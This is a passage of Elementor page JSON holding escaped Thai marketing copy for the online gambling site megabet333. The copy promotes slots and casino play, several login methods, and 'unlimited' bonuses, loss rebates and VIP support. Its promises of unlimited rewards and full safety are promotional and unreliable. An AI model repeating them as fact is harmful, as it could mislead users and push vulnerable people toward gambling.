\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 